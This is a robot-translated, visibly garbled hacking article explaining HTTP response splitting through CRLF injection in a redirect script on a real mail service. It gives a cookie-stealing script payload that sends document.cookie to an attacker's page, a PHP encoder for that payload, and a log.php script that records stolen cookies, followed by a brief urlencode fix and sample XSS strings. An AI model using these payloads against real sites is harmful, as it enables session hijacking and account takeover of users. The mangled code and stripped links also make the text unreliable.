This page has been robot translated, sorry for typos if any. Original content here.

HTTP splitting vulnerability

This article discusses the practical application of a vulnerability known as HTTP splitting vulnerability.

Bazhny header () under the microscope

Wandering through the Internet, we often observe the url of the form A simple-minded user, without long thinking, just clicks on it also pleases on An inquisitive user submits the address of his hompagi to the url's location and also makes sure of the script's curvature.
In addition to the simple curious on the Internet live very curious users. They drive in a link in AccessDiver also starting to learn how the script works.

1. The essence of the bug.
2. Practical application.
3. The location of the prevalence of error.
4. Means of protection.

for tankers, I suggest that AccessDiver is “hakresky”, as is customary to express in a nation, an instrument. Download it allowed on the offsite project. At the time of this writing, the latest version of the utility was 4.173. The program is best known for its HTTP debuger function. You can use it by going to expert mode by also selecting the appropriate function in the Tools menu (F4 then Ctr + F9 - depending on the version, they could be changed). Then we will not emphasize the concern of its setting, any schoolboy can cope with a diver.

for experiments, we chose , since this is the most famous postal service in runet, and the reader will be particularly interested to learn about the bug on this project;) Let's follow the link / . We will be transferred to the most chosen portal on computer security;). We add the site to the bookmarks and return to the mail. Write the link that interests us in the HTTP Address field, set the Mode to Get, click Connect.
Before us will appear the HTTP headers returned by the server, approximately as in the screenshot:

Let us take care of the underlined line. When we meet with Location: headers, the browser unconditionally takes us to the specified url. Consequently, we can slip a link to the user, as if on a mail, but he will get nothing at all on the mail. All this is wonderful, but in practice nothing alienates.

Note that the lines in the header are separated by two characters 0Dh 0Ah . And what, if attributed to them at the end of the link? Let's see what the server will give us back to the objection to the request :

How interesting. So we can force the server to produce almost any header. For example, modify user cookies. But, again, this is still not as interesting as the fact that hesitates us ahead. Interestingly, the headers are separated from the body of the act by the sequence 0Dh 0Ah 0Dh 0Ah . Are we able to give full any page? Enter 0D% 0A% 0D% 0A <script> alert (document.cookie); </ script> <! - also look at:

All that is yellow is the text of the document itself. If JavaScript is enabled in the browser, then follow the link and we will see a message box with our cookies. In order to make a XSS attack, you need:
1) Create a page like <script> document.location = ''+document.cookie; </ script>
2) Translate it into url-encode using a script:

<? php
$ url = "";
$ s = "<script> document.location = 'http: //'";
$ s. = "+ document.cookie; </ script>";
$ res = "";
for ($ i = 0; $ i <strlen ($ s); $ i ++)
$ res. = "%";
$ t = ord ($ s [$ i]);
if ($ t <16)
$ res. = "0";
$ res. = dechex ($ t);

echo $ url. "% 0d% 0a% 0d% 0a". $ res;

We get: ... etc. (**)

3) write a script log.php also upload it to
<? php
$ fid = fopen ("../ log.txt", "a");
fputs ($ fid, $ _SERVER ["QUERY_STRING"]. "\ r \ r \ r");
fclose ($ fid);
header ("Location:");

Now it is allowed to pair the magic link (**) also to purchase the victim’s cookies.
They are allowed to do a lot of useful things, for example, to get access to the mail, but about that some other time, we also distracted ourselves so much from the main topic.

Of course, it is not necessary to drive on the mail that it is a great resource, shit, and it’s not from our sandbox either. It is common for all people to make a mistake, but admins make mistakes less and less often. True bugs still remain. , people are silent about them not because of greed, but because of the fear of inadequate reaction of the administration to their finding, which, according to statistics, owns the place. Fortunately, the presence of XSS does not guarantee access to the mailbox. I'm sure the bug will be covered. After 2 days at the latest. Vulnerable not only I strongly recommend to read:[XSS][XSS]

Frankly, we were very surprised at what time I learned that was written about such vulnerabilities 3 years ago (see CRLF implementation in the PHP header () function from September 10, 2002), but since we don’t I have heard more than once, then I considered the topic relevant. In addition, blah blah vryatli allowed to call in any way relevant the presence of bugs on Yandex, Rambler also email.

Correct the error is not difficult. Let him eat the vulnerable script:

if (! isset ($ url))
$ url = "";

header ("Location: $ url");


We make him invulnerable:

header ("Location:" .urlencode ($ url));

If the redirect is planned only within the site, then it is best to do this:

header ("Location:".urlencode($url));

Here perhaps also everything that we wanted to inform. Let me offer some more XSS: "> <h1> XSS </ h1> "<h1> XSS </ h1>